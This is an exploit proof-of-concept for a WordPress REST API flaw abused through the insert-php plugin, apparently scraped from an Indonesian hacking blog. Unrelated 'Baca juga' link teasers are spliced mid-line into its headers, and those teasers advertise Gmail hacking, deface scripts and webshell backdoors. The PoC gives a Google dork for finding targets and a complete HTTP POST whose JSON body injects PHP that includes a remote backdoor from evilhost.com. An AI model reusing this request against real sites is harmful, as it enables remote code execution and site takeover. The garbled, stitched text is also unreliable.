# Exploit Author: sucuri.net @sucurisecurity
# Date: 2017-02-09Baca juga — 7+ Cara Hack Slot Olympus Dengan APK Modlympus (Cheat).
# Google Dork : inurl:/wp-content/plugins/insert-php/
# Vendor Homepage: https://fr.wordpress.org/plugins/insert-php/
Baca juga — Cara Memasang Backlink di Webshell (Backdoor), Tetap Awet!.
# Tested on: MSWin32
# Version: <3.3.1
# Explanation : You Can Inject PHP Code INTO Pages via Wordpress REST API Vulnerability
Baca juga — 2000+ Script Deface HTML Terbaru 2023, Defacer Harus Punya!.
# PoC :
POST http://localhost.com/wp-json/wp/v2/posts/1234 HTTP/1.1
Host: localhost.comBaca juga — 7 Cara Hack Akun Gmail 2023, Apakah Masih Work?.
User-Agent: Xploit
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8Baca juga — Cara Bypass File Restriction untuk Upload Shell Backdoor.
Accept-Encoding: gzip,deflate,lzma,sdch
Connection: keep-alive
Baca juga — 15+ Cara Menjadi Hacker Pro Seperti "Hacker Bjorka".
content-type: application/json
{ "id": "1234ffff", "title": "by Hacker", "content": "[insert_php] include('http[:]//evilhost.com/file/backdoor.php'); [/insert_php][php] include('http[:]//evilhost.com/file/backdoor.php'); [/php]" }
# Reference : https://blog.sucuri.net/2017/02/rce-attempts-against-the-latest-wordpress-rest-api-vulnerability.html